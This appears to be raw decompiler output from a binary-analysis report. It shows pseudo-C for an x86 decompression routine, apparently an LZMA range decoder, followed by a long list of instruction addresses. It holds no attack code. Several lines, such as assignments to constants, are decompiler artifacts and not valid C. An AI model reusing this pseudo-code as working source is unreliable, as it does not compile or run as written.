                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												 *(__ebp - 0x88) = 0xe;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t156 = __ebp - 0x70;
                                                              											 *_t156 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t156;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											while(1) {
                                                              												L48:
                                                              												__eflags = __ebx - 0x100;
                                                              												if(__ebx >= 0x100) {
                                                              													break;
                                                              												}
                                                              												__eax =  *(__ebp - 0x58);
                                                              												__edx = __ebx + __ebx;
                                                              												__ecx =  *(__ebp - 0x10);
                                                              												__esi = __edx + __eax;
                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              												__ax =  *__esi;
                                                              												 *(__ebp - 0x54) = __esi;
                                                              												__edi = __ax & 0x0000ffff;
                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              													__cx = __ax;
                                                              													_t170 = __edx + 1; // 0x1
                                                              													__ebx = _t170;
                                                              													__cx = __ax >> 5;
                                                              													__eflags = __eax;
                                                              													 *__esi = __ax;
                                                              												} else {
                                                              													 *(__ebp - 0x10) = __ecx;
                                                              													0x800 = 0x800 - __edi;
                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              													__ebx = __ebx + __ebx;
                                                              													 *__esi = __cx;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              												 *(__ebp - 0x44) = __ebx;
                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                              													continue;
                                                              												} else {
                                                              													goto L46;
                                                              												}
                                                              											}
                                                              											L54:
                                                              											_t173 = __ebp - 0x34;
                                                              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                              											__eflags =  *_t173;
                                                              											goto L55;
                                                              										case 0xf:
                                                              											L58:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												 *(__ebp - 0x88) = 0xf;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t203 = __ebp - 0x70;
                                                              											 *_t203 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t203;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											L60:
                                                              											__eflags = __ebx - 0x100;
                                                              											if(__ebx >= 0x100) {
                                                              												L55:
                                                              												__al =  *(__ebp - 0x44);
                                                              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                              												goto L56;
                                                              											}
                                                              											L61:
                                                              											__eax =  *(__ebp - 0x58);
                                                              											__edx = __ebx + __ebx;
                                                              											__ecx =  *(__ebp - 0x10);
                                                              											__esi = __edx + __eax;
                                                              											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              											__ax =  *__esi;
                                                              											 *(__ebp - 0x54) = __esi;
                                                              											__edi = __ax & 0x0000ffff;
                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              												__cx = __ax;
                                                              												_t217 = __edx + 1; // 0x1
                                                              												__ebx = _t217;
                                                              												__cx = __ax >> 5;
                                                              												__eflags = __eax;
                                                              												 *__esi = __ax;
                                                              											} else {
                                                              												 *(__ebp - 0x10) = __ecx;
                                                              												0x800 = 0x800 - __edi;
                                                              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              												__ebx = __ebx + __ebx;
                                                              												 *__esi = __cx;
                                                              											}
                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              											 *(__ebp - 0x44) = __ebx;
                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                              												goto L60;
                                                              											} else {
                                                              												goto L58;
                                                              											}
                                                              										case 0x10:
                                                              											L110:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												 *(__ebp - 0x88) = 0x10;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t366 = __ebp - 0x70;
                                                              											 *_t366 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t366;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											goto L112;
                                                              										case 0x11:
                                                              											L69:
                                                              											__esi =  *(__ebp - 0x58);
                                                              											 *(__ebp - 0x84) = 0x12;
                                                              											L132:
                                                              											 *(_t612 - 0x54) = _t605;
                                                              											goto L133;
                                                              										case 0x12:
                                                              											goto L0;
                                                              										case 0x13:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												_t469 = __ebp - 0x58;
                                                              												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                              												__eflags =  *_t469;
                                                              												 *(__ebp - 0x30) = 0x10;
                                                              												 *(__ebp - 0x40) = 8;
                                                              												goto L144;
                                                              											}
                                                              											__eax =  *(__ebp - 0x4c);
                                                              											__ecx =  *(__ebp - 0x58);
                                                              											__eax =  *(__ebp - 0x4c) << 4;
                                                              											 *(__ebp - 0x30) = 8;
                                                              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                              											goto L130;
                                                              										case 0x14:
                                                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                              											__eax =  *(__ebp - 0x80);
                                                              											L140:
                                                              											 *(_t612 - 0x88) = _t533;
                                                              											goto L1;
                                                              										case 0x15:
                                                              											__eax = 0;
                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              											__al = __al & 0x000000fd;
                                                              											__eax = (__eflags >= 0) - 1 + 0xb;
                                                              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                              											goto L121;
                                                              										case 0x16:
                                                              											__eax =  *(__ebp - 0x30);
                                                              											__eflags = __eax - 4;
                                                              											if(__eax >= 4) {
                                                              												_push(3);
                                                              												_pop(__eax);
                                                              											}
                                                              											__ecx =  *(__ebp - 4);
                                                              											 *(__ebp - 0x40) = 6;
                                                              											__eax = __eax << 7;
                                                              											 *(__ebp - 0x7c) = 0x19;
                                                              											 *(__ebp - 0x58) = __eax;
                                                              											goto L145;
                                                              										case 0x17:
                                                              											goto L145;
                                                              										case 0x18:
                                                              											L146:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												 *(__ebp - 0x88) = 0x18;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t484 = __ebp - 0x70;
                                                              											 *_t484 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t484;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											L148:
                                                              											_t487 = __ebp - 0x48;
                                                              											 *_t487 =  *(__ebp - 0x48) - 1;
                                                              											__eflags =  *_t487;
                                                              											goto L149;
                                                              										case 0x19:
                                                              											__eflags = __ebx - 4;
                                                              											if(__ebx < 4) {
                                                              												 *(__ebp - 0x2c) = __ebx;
                                                              												L120:
                                                              												_t394 = __ebp - 0x2c;
                                                              												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                              												__eflags =  *_t394;
                                                              												L121:
                                                              												__eax =  *(__ebp - 0x2c);
                                                              												__eflags = __eax;
                                                              												if(__eax == 0) {
                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                              													goto L170;
                                                              												}
                                                              												__eflags = __eax -  *(__ebp - 0x60);
                                                              												if(__eax >  *(__ebp - 0x60)) {
                                                              													goto L171;
                                                              												}
                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                              												__eax =  *(__ebp - 0x30);
                                                              												_t401 = __ebp - 0x60;
                                                              												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                              												__eflags =  *_t401;
                                                              												goto L124;
                                                              											}
                                                              											__ecx = __ebx;
                                                              											__eax = __ebx;
                                                              											__ecx = __ebx >> 1;
                                                              											__eax = __ebx & 0x00000001;
                                                              											__ecx = (__ebx >> 1) - 1;
                                                              											__al = __al | 0x00000002;
                                                              											__eax = (__ebx & 0x00000001) << __cl;
                                                              											__eflags = __ebx - 0xe;
                                                              											 *(__ebp - 0x2c) = __eax;
                                                              											if(__ebx >= 0xe) {
                                                              												__ebx = 0;
                                                              												 *(__ebp - 0x48) = __ecx;
                                                              												L103:
                                                              												__eflags =  *(__ebp - 0x48);
                                                              												if( *(__ebp - 0x48) <= 0) {
                                                              													__eax = __eax + __ebx;
                                                              													 *(__ebp - 0x40) = 4;
                                                              													 *(__ebp - 0x2c) = __eax;
                                                              													__eax =  *(__ebp - 4);
                                                              													__eax =  *(__ebp - 4) + 0x644;
                                                              													__eflags = __eax;
                                                              													L109:
                                                              													__ebx = 0;
                                                              													 *(__ebp - 0x58) = __eax;
                                                              													 *(__ebp - 0x50) = 1;
                                                              													 *(__ebp - 0x44) = 0;
                                                              													 *(__ebp - 0x48) = 0;
                                                              													L113:
                                                              													__eax =  *(__ebp - 0x40);
                                                              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                              														_t392 = __ebp - 0x2c;
                                                              														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                              														__eflags =  *_t392;
                                                              														goto L120;
                                                              													}
                                                              													__eax =  *(__ebp - 0x50);
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                              													__eax =  *(__ebp - 0x58);
                                                              													__esi = __edi + __eax;
                                                              													 *(__ebp - 0x54) = __esi;
                                                              													__ax =  *__esi;
                                                              													__ecx = __ax & 0x0000ffff;
                                                              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                              													__eflags =  *(__ebp - 0xc) - __edx;
                                                              													if( *(__ebp - 0xc) >= __edx) {
                                                              														__ecx = 0;
                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                              														__ecx = 1;
                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                              														__ebx = 1;
                                                              														__ecx =  *(__ebp - 0x48);
                                                              														__ebx = 1 << __cl;
                                                              														__ecx = 1 << __cl;
                                                              														__ebx =  *(__ebp - 0x44);
                                                              														__ebx =  *(__ebp - 0x44) | __ecx;
                                                              														__cx = __ax;
                                                              														__cx = __ax >> 5;
                                                              														__eax = __eax - __ecx;
                                                              														__edi = __edi + 1;
                                                              														__eflags = __edi;
                                                              														 *(__ebp - 0x44) = __ebx;
                                                              														 *__esi = __ax;
                                                              														 *(__ebp - 0x50) = __edi;
                                                              													} else {
                                                              														 *(__ebp - 0x10) = __edx;
                                                              														0x800 = 0x800 - __ecx;
                                                              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                              														 *__esi = __dx;
                                                              													}
                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                              														L112:
                                                              														_t369 = __ebp - 0x48;
                                                              														 *_t369 =  *(__ebp - 0x48) + 1;
                                                              														__eflags =  *_t369;
                                                              														goto L113;
                                                              													} else {
                                                              														goto L110;
                                                              													}
                                                              												}
                                                              												__ecx =  *(__ebp - 0xc);
                                                              												__ebx = __ebx + __ebx;
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              												 *(__ebp - 0x44) = __ebx;
                                                              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                              													__ecx =  *(__ebp - 0x10);
                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              													__ebx = __ebx | 0x00000001;
                                                              													__eflags = __ebx;
                                                              													 *(__ebp - 0x44) = __ebx;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                              													L102:
                                                              													_t339 = __ebp - 0x48;
                                                              													 *_t339 =  *(__ebp - 0x48) - 1;
                                                              													__eflags =  *_t339;
                                                              													goto L103;
                                                              												} else {
                                                              													goto L100;
                                                              												}
                                                              											}
                                                              											__edx =  *(__ebp - 4);
                                                              											__eax = __eax - __ebx;
                                                              											 *(__ebp - 0x40) = __ecx;
                                                              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                              											goto L109;
                                                              										case 0x1a:
                                                              											L56:
                                                              											__eflags =  *(__ebp - 0x64);
                                                              											if( *(__ebp - 0x64) == 0) {
                                                              												 *(__ebp - 0x88) = 0x1a;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x68);
                                                              											__al =  *(__ebp - 0x5c);
                                                              											__edx =  *(__ebp - 8);
                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              											 *( *(__ebp - 0x68)) = __al;
                                                              											__ecx =  *(__ebp - 0x14);
                                                              											 *(__ecx +  *(__ebp - 8)) = __al;
                                                              											__eax = __ecx + 1;
                                                              											__edx = 0;
                                                              											_t192 = __eax %  *(__ebp - 0x74);
                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                              											__edx = _t192;
                                                              											goto L80;
                                                              										case 0x1b:
                                                              											L76:
                                                              											__eflags =  *(__ebp - 0x64);
                                                              											if( *(__ebp - 0x64) == 0) {
                                                              												 *(__ebp - 0x88) = 0x1b;
                                                              												goto L170;
                                                              											}
                                                              											__eax =  *(__ebp - 0x14);
                                                              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              											__eflags = __eax -  *(__ebp - 0x74);
                                                              											if(__eax >=  *(__ebp - 0x74)) {
                                                              												__eax = __eax +  *(__ebp - 0x74);
                                                              												__eflags = __eax;
                                                              											}
                                                              											__edx =  *(__ebp - 8);
                                                              											__cl =  *(__eax + __edx);
                                                              											__eax =  *(__ebp - 0x14);
                                                              											 *(__ebp - 0x5c) = __cl;
                                                              											 *(__eax + __edx) = __cl;
                                                              											__eax = __eax + 1;
                                                              											__edx = 0;
                                                              											_t275 = __eax %  *(__ebp - 0x74);
                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                              											__edx = _t275;
                                                              											__eax =  *(__ebp - 0x68);
                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              											_t284 = __ebp - 0x64;
                                                              											 *_t284 =  *(__ebp - 0x64) - 1;
                                                              											__eflags =  *_t284;
                                                              											 *( *(__ebp - 0x68)) = __cl;
                                                              											L80:
                                                              											 *(__ebp - 0x14) = __edx;
                                                              											goto L81;
                                                              										case 0x1c:
                                                              											while(1) {
                                                              												L124:
                                                              												__eflags =  *(__ebp - 0x64);
                                                              												if( *(__ebp - 0x64) == 0) {
                                                              													break;
                                                              												}
                                                              												__eax =  *(__ebp - 0x14);
                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                              													__eflags = __eax;
                                                              												}
                                                              												__edx =  *(__ebp - 8);
                                                              												__cl =  *(__eax + __edx);
                                                              												__eax =  *(__ebp - 0x14);
                                                              												 *(__ebp - 0x5c) = __cl;
                                                              												 *(__eax + __edx) = __cl;
                                                              												__eax = __eax + 1;
                                                              												__edx = 0;
                                                              												_t415 = __eax %  *(__ebp - 0x74);
                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                              												__edx = _t415;
                                                              												__eax =  *(__ebp - 0x68);
                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                              												__eflags =  *(__ebp - 0x30);
                                                              												 *( *(__ebp - 0x68)) = __cl;
                                                              												 *(__ebp - 0x14) = _t415;
                                                              												if( *(__ebp - 0x30) > 0) {
                                                              													continue;
                                                              												} else {
                                                              													L81:
                                                              													 *(__ebp - 0x88) = 2;
                                                              													goto L1;
                                                              												}
                                                              											}
                                                              											 *(__ebp - 0x88) = 0x1c;
                                                              											L170:
                                                              											_push(0x22);
                                                              											_pop(_t567);
                                                              											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                              											_t535 = 0;
                                                              											L172:
                                                              											return _t535;
                                                              									}
                                                              								}
                                                              								L171:
                                                              								_t535 = _t534 | 0xffffffff;
                                                              								goto L172;
                                                              							}
                                                              						}
                                                              						__eax =  *(__ebp - 0x50);
                                                              						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                              						__eax =  *(__ebp - 0x58);
                                                              						__esi = __edx + __eax;
                                                              						 *(__ebp - 0x54) = __esi;
                                                              						__ax =  *__esi;
                                                              						__edi = __ax & 0x0000ffff;
                                                              						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              						if( *(__ebp - 0xc) >= __ecx) {
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              							__cx = __ax;
                                                              							__cx = __ax >> 5;
                                                              							__eax = __eax - __ecx;
                                                              							__edx = __edx + 1;
                                                              							 *__esi = __ax;
                                                              							 *(__ebp - 0x50) = __edx;
                                                              						} else {
                                                              							 *(__ebp - 0x10) = __ecx;
                                                              							0x800 = 0x800 - __edi;
                                                              							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                              							 *__esi = __cx;
                                                              						}
                                                              						if( *(__ebp - 0x10) >= 0x1000000) {
                                                              							goto L148;
                                                              						} else {
                                                              							goto L146;
                                                              						}
                                                              					}
                                                              					goto L1;
                                                              				}
                                                              			}








                                                              0x00000000
                                                              0x00407395
                                                              0x00407395
                                                              0x00407399
                                                              0x004073be
                                                              0x004073c8
                                                              0x00000000
                                                              0x0040739b
                                                              0x0040739b
                                                              0x0040739e
                                                              0x004073a2
                                                              0x004073a5
                                                              0x004073a8
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073af
                                                              0x00407489
                                                              0x00407489
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x004074c7
                                                              0x004074cb
                                                              0x0040752b
                                                              0x0040752e
                                                              0x00407533
                                                              0x00407534
                                                              0x00407536
                                                              0x00407538
                                                              0x0040753b
                                                              0x00407447
                                                              0x00407447
                                                              0x00407447
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406bec
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x00000000
                                                              0x00406bfd
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c06
                                                              0x00406c09
                                                              0x00406c0c
                                                              0x00406c10
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c16
                                                              0x00406c19
                                                              0x00406c1b
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406c21
                                                              0x00406c22
                                                              0x00406c24
                                                              0x00406c27
                                                              0x00406c2c
                                                              0x00406c31
                                                              0x00406c3a
                                                              0x00406c4d
                                                              0x00406c50
                                                              0x00406c5c
                                                              0x00406c84
                                                              0x00406c86
                                                              0x00406c94
                                                              0x00406c94
                                                              0x00406c98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c88
                                                              0x00406c8b
                                                              0x00406c8c
                                                              0x00406c8c
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c62
                                                              0x00406c67
                                                              0x00406c67
                                                              0x00406c70
                                                              0x00406c78
                                                              0x00406c7b
                                                              0x00000000
                                                              0x00406c81
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c9e
                                                              0x00406c9e
                                                              0x00406ca2
                                                              0x0040754e
                                                              0x00000000
                                                              0x0040754e
                                                              0x00406cab
                                                              0x00406cbb
                                                              0x00406cbe
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc4
                                                              0x00406cc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406cca
                                                              0x00406cd0
                                                              0x00406cfa
                                                              0x00406d00
                                                              0x00406d07
                                                              0x00000000
                                                              0x00406d07
                                                              0x00406cd6
                                                              0x00406cd9
                                                              0x00406cde
                                                              0x00406cde
                                                              0x00406ce9
                                                              0x00406cf1
                                                              0x00406cf4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d39
                                                              0x00406d3f
                                                              0x00406d42
                                                              0x00406d4f
                                                              0x00406d57
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d0e
                                                              0x00406d0e
                                                              0x00406d12
                                                              0x0040755d
                                                              0x00000000
                                                              0x0040755d
                                                              0x00406d1e
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d32
                                                              0x00406d37
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040741c
                                                              0x00407420
                                                              0x004075cf
                                                              0x00000000
                                                              0x004075cf
                                                              0x0040742c
                                                              0x00407433
                                                              0x0040743b
                                                              0x0040743e
                                                              0x00407441
                                                              0x00407441
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5f
                                                              0x00406d61
                                                              0x00406d64
                                                              0x00406dd5
                                                              0x00406dd8
                                                              0x00406ddb
                                                              0x00406de2
                                                              0x00406dec
                                                              0x00000000
                                                              0x00406dec
                                                              0x00406d66
                                                              0x00406d6a
                                                              0x00406d6d
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d75
                                                              0x00406d77
                                                              0x00406d7a
                                                              0x00406d7c
                                                              0x00406d81
                                                              0x00406d84
                                                              0x00406d87
                                                              0x00406d8b
                                                              0x00406d92
                                                              0x00406d95
                                                              0x00406d9c
                                                              0x00406da0
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406dac
                                                              0x00406daf
                                                              0x00406dcd
                                                              0x00406dcf
                                                              0x00000000
                                                              0x00406db1
                                                              0x00406db1
                                                              0x00406db4
                                                              0x00406db7
                                                              0x00406dba
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbf
                                                              0x00406dc2
                                                              0x00406dc4
                                                              0x00406dc5
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406ffe
                                                              0x00407002
                                                              0x00407020
                                                              0x00407023
                                                              0x0040702a
                                                              0x0040702d
                                                              0x00407030
                                                              0x00407033
                                                              0x00407036
                                                              0x00407039
                                                              0x0040703b
                                                              0x00407042
                                                              0x00407043
                                                              0x00407045
                                                              0x00407048
                                                              0x0040704b
                                                              0x0040704e
                                                              0x0040704e
                                                              0x00407053
                                                              0x00000000
                                                              0x00407053
                                                              0x00407004
                                                              0x00407007
                                                              0x0040700a
                                                              0x00407014
                                                              0x00000000
                                                              0x00000000
                                                              0x00407068
                                                              0x0040706c
                                                              0x0040708f
                                                              0x00407092
                                                              0x00407095
                                                              0x0040709f
                                                              0x0040706e
                                                              0x0040706e
                                                              0x00407071
                                                              0x00407074
                                                              0x00407077
                                                              0x00407084
                                                              0x00407087
                                                              0x00407087
                                                              0x00000000
                                                              0x00000000
                                                              0x004070ab
                                                              0x004070af
                                                              0x00000000
                                                              0x00000000
                                                              0x004070b5
                                                              0x004070b9
                                                              0x00000000
                                                              0x00000000
                                                              0x004070bf
                                                              0x004070c1
                                                              0x004070c5
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070cc
                                                              0x00000000
                                                              0x00000000
                                                              0x0040711c
                                                              0x00407120
                                                              0x00407127
                                                              0x0040712a
                                                              0x0040712d
                                                              0x00407137
                                                              0x00000000
                                                              0x00407137
                                                              0x00407122
                                                              0x00000000
                                                              0x00000000
                                                              0x00407143
                                                              0x00407147
                                                              0x0040714e
                                                              0x00407151
                                                              0x00407154
                                                              0x00407149
                                                              0x00407149
                                                              0x00407149
                                                              0x00407157
                                                              0x0040715a
                                                              0x0040715d
                                                              0x0040715d
                                                              0x00407160
                                                              0x00407163
                                                              0x00407166
                                                              0x00407166
                                                              0x00407169
                                                              0x00407170
                                                              0x00407175
                                                              0x00000000
                                                              0x00000000
                                                              0x00407203
                                                              0x00407203
                                                              0x00407207
                                                              0x004075a5
                                                              0x00000000
                                                              0x004075a5
                                                              0x0040720d
                                                              0x00407210
                                                              0x00407213
                                                              0x00407217
                                                              0x0040721a
                                                              0x00407220
                                                              0x00407222
                                                              0x00407222
                                                              0x00407222
                                                              0x00407225
                                                              0x00407228
                                                              0x00000000
                                                              0x00000000
                                                              0x00406df8
                                                              0x00406df8
                                                              0x00406dfc
                                                              0x00407569
                                                              0x00000000
                                                              0x00407569
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0c
                                                              0x00406e0f
                                                              0x00406e15
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e1a
                                                              0x00406e1d
                                                              0x00406e1d
                                                              0x00406e20
                                                              0x00406e23
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e29
                                                              0x00406e2f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e35
                                                              0x00406e35
                                                              0x00406e39
                                                              0x00406e3c
                                                              0x00406e3f
                                                              0x00406e42
                                                              0x00406e45
                                                              0x00406e46
                                                              0x00406e49
                                                              0x00406e4b
                                                              0x00406e51
                                                              0x00406e54
                                                              0x00406e57
                                                              0x00406e5a
                                                              0x00406e5d
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e7f
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8f
                                                              0x00406e93
                                                              0x00406e95
